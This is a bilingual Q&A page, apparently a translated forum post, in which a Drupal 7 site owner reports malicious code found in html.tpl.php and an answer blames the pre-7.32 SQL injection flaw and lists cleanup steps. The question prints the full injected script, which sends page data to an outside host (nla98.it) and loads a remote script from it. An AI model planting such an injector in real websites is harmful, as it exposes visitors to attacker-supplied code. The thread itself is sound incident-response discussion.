恶意代码注入了Drupal 7网站(html.tpl.php)
[英]Malicious code injected into Drupal 7 website (html.tpl.php)
问题描述
Recently my Drupal site was stuck back on 7.23. 
最近,我的Drupal网站停留在7.23上。 I had to essentially go back in time, restore an old DB, and then copy/paste HTML to get a clean version of the current site. 实际上,我必须回到过去,还原旧的数据库,然后复制/粘贴HTML以获取当前站点的干净版本。 Unfortunately even after going through all of this, today I was checking through my site and when I load up the admin dashboard I saw an awkward URL in the bottom left of my browser. 不幸的是,即使经历了所有这些事情,今天我仍在检查我的网站,并且在加载管理仪表盘时,在浏览器的左下方看到了一个尴尬的URL。 The URL was 'nla98.it'. 网址为“ nla98.it”。 So I ran a find in files using Sublime text and found the following code, which I definitely hadn't inserted into my modules/system/html.tpl.php: 因此,我使用Sublime文本在文件中进行了查找,并找到了以下代码,我肯定没有将其插入到modules / system / html.tpl.php中:
<script>
var a=''; setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://nla98.it/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){
document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>
Obviously this is some sort of script to execute code. 显然,这是某种执行代码的脚本。 But my question is, how was this injected into my site? 但是我的问题是,这是如何注入我的网站的? I am running Drupal 7, upgraded to 7.41 and I have ran the update script and cron multiple times. 我正在运行Drupal 7,升级到7.41,并且已多次运行更新脚本和cron。 The scripts I am running are: 我正在运行的脚本是:
jquery.js?v=1.12.0
jquery.once.js?v=1.2
drupal.js
jquery.cookie.js?v=1.0
textarea.js?v=7.41
jquery-ui-1.8.23.custom.min.js
gumby.js
modernizr-2.0.6.min.js
mobile-menu.js
jquery.ui.totop.js
easing.js
plugins.js
jquery.tweet.js
main.js
montreal.js
supersized.js
gen_validatorv31.js
http://html5shiv.googlecode.com/svn/trunk/html5.js
http://platform.linkedin.com/in.js
Could it be an exploit within one of the outdated JS I am using? 这可能是我正在使用的一个过时的JS中的一个漏洞吗? The template I am using is Montreal (a bit older). 我使用的模板是蒙特利尔(有点旧)。
Thanks for your ideas. 感谢您的想法。
1 个解决方案
解决方案1
0 2016-01-20 07:04:36
There was a highly critical vulnerability in Drupal till version 7.32 (sql injection on login). 在7.32版之前,Drupal中存在一个非常关键的漏洞(登录时进行SQL注入)。 You could basically do anything : log as super admin then execute php code/upload files (with menus)/create accounts/... . 您基本上可以做任何事情:以超级管理员身份登录,然后执行php代码/上传文件(带有菜单)/创建帐户/...。 I doubt your problem came from outdated js library. 我怀疑您的问题来自过时的js库。 So what you can do after upgrading core : 因此,升级核心后您可以做什么:
- Check no extra file is present 检查是否没有多余的文件
- Check no extra account was created. 检查是否没有创建额外的帐户。
- Check no extra menu links were referenced 检查是否未引用其他菜单链接
- Check your custom files (modules/theme/...) are identical to your versioned copy if you got one, else you are good to check manually all code. 如果有,请检查您的自定义文件(模块/主题/ ...)是否与版本副本相同,否则最好手动检查所有代码。
- Check if php execution is disabled 检查PHP执行是否被禁用
- Cross fingers nothing more was affected (if he could execute commands with exec() on your server, there is no limit... ). 交叉手指再也没有受到影响(如果他可以在您的服务器上使用exec()执行命令,则没有限制...)。
Faster but radical solution (and the only one 100% safe) : wipe your server reinstall it, copy your old base and drupal files from your versioning software(git, svn, ...) and upgrade core to 7.41. 更快但更彻底的解决方案(也是唯一的一种100%安全的解决方案):擦拭服务器,重新安装它,从版本控制软件(git,svn,...)中复制旧的基本文件和drupal文件,并将核心升级到7.41。
Next time, try to upgrade your drupal core more often, this vulnerability was fixed almost immediatly after it was known, most of the sites attacked waited too long to update core. 下次,尝试更频繁地升级您的drupal核心,此漏洞在被发现后几乎立即得到修复,大多数受攻击的站点都等待太长时间来更新核心。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.